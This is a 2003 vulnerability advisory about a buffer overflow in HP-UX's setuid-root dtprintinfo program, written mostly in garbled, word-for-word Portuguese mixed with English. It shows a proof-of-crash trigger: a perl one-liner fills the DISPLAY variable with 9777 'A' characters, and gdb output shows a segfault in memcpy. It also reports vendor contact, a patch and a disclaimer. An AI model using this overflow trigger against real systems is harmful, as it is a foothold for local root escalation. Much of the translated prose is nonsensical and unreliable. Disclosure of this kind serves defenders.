=======================================================
HPUX dtprintinfo buffer transborda vulnerabilidade
=======================================================
Davide Del Vecchio Adv#7
Discovered in: 14/07/2003
Date: 08/10/2003
Testado em HP-UX B.11.00 Descrição:
O programa do Expectador De Impressão fornece uma interface gráfica
que displays
a condição de impressão enfileira e imprime trabalhos.
dante@sofficino :/usr/dt/bin >ls -al /usr/dt/bin/dtprintinfo
-r-sr-xr-x 1 root bin 471040 Sep 22 2000 dtprintinfo
Exporting the DISPLAY variable with a long argument...
dante@sofficino :/usr/dt/bin >export DISPLAY="`perl -e 'printf
"A" x 9777'`"
dante@sofficino :/usr/dt/bin >/usr/dt/bin/dtprintinfo
Memory fault
De saída do gdb nós podemos ver:
Programa recebido SIGSEGV DE sinal, falta do Segmentation.
0x7f75fb08 in memcpy () from /usr/lib/libc.2 Solution:
Eu Estou Em contato com pessoal de Segurança Da HP, especialmente
com o John Morris,
e Eu poderia gostar de para obrigado ele e todo seu pessoal ao interesse
demonstrado durante este período de pesquisa em HP-UX.
Ele assegurou me um remendo tem sido escrito e um Bullettin De Segurança
Oficial
Créditos:
Davide Del Vecchio poderia gostar de agradecer todo as pessoas suportando
ele
e sua pesquisa, seu amor que nunca folhas ele sós, e óbvias,
o HP-UX pessoal de segurança, impersonified neste caso por John
Morris. Disclaimer:
A informação dentro este papel pode mudança sem
nota. Use disto
informação constitui aceitação para uso
em um COMO É condição.
Não Há garantias com consideração para esta
informação. Em nenhum evento shall
o autor está responsável para quaisquer prejuízos
qualquer que subindo fora de ou em
conexão com o uso ou espalha desta informação.
Qualquer uso deste
informação está em risco próprio do usuário.
^^^^^^^^
Cracks's S.A